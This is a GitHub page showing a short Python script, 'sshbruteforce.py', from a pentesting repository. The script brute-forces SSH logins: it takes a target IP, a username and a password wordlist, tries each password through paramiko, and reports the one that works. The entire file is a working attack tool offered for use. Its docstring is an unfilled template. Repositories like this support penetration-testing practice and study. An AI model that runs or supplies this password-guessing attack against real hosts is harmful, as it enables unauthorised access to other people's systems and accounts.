PythonPentesting/sshbruteforce.py at main · tjf952/PythonPentesting · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
#!/usr/bin/env python3

"""_title_

_description_

Usage: $ python3 sshbruteforce.py [-h] -t TARGET -u USER -p PASSWORD_FILE`

Arguments:
    -_param_ <type>: _description_
"""

### Import Statements ###

import argparse
import os
import sys
from typing import TextIO

import paramiko

SSH_PORT = 22

### Functions ###


def ssh_connect(target: str, user: str, password: str, code: int = 0) -> int:
    """Try to connect through SSH service

    Args:
        target (str): IP of target
        user (str): A known username for SSH login
        password (str): Password to try

    Returns:
        int: Returned code
    """
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        ssh.connect(target, port=SSH_PORT, username=user, password=password)
    except paramiko.AuthenticationException:
        code = 1
    ssh.close()
    return code


def ssh_bruteforce(target: str, user: str, pfile: TextIO) -> bool:
    """Bruteforce SSH login

    Args:
        target (str): IP of target
        user (str): A known username for SSH login
        pfile (TextIO): File containing passwords to try

    Returns:
        bool: Value for success or failure
    """
    for line in pfile.readlines():
        password = line.strip()
        try:
            response = ssh_connect(target, user, password)
            if response == 0:
                print(f"[+] Password found: {password}")
                return True
            elif response == 1:
                print(f"[-] Failed attempt: {password}")
        except Exception as e:
            print(e)
    return False


def parse_args() -> argparse.Namespace:
    """Argument Parser

    Returns:
        argparse.Namespace: Parsed arguments for usage
    """
    parser = argparse.ArgumentParser(description="SSH Bruteforcer")
    parser.add_argument(
        "-t", "--target", type=str, help="The IP of the target", required=True
    )
    parser.add_argument(
        "-u",
        "--username",
        type=str,
        help="The username to bruteforce for",
        required=True,
    )
    parser.add_argument(
        "-p",
        "--pfile",
        type=argparse.FileType("r"),
        help="File containing passwords",
        required=True,
    )
    parser.add_argument("--port", type=int, help="SSH port [default: 22]")
    return parser.parse_args()


if __name__ == "__main__":
    args = parse_args()
    print(f"Brute force against {args.target}")
    print(f"\t- Using username <{args.username}>")
    print(f"\t- Using password file at <{args.pfile.name}>")
    if args.port:
        SSH_PORT = args.port
    print(f"Attacking SSH on port {SSH_PORT}")
    win = ssh_bruteforce(args.target, args.username, args.pfile)
    if not win:
        print("Failed to find a password, try another wordlist or user")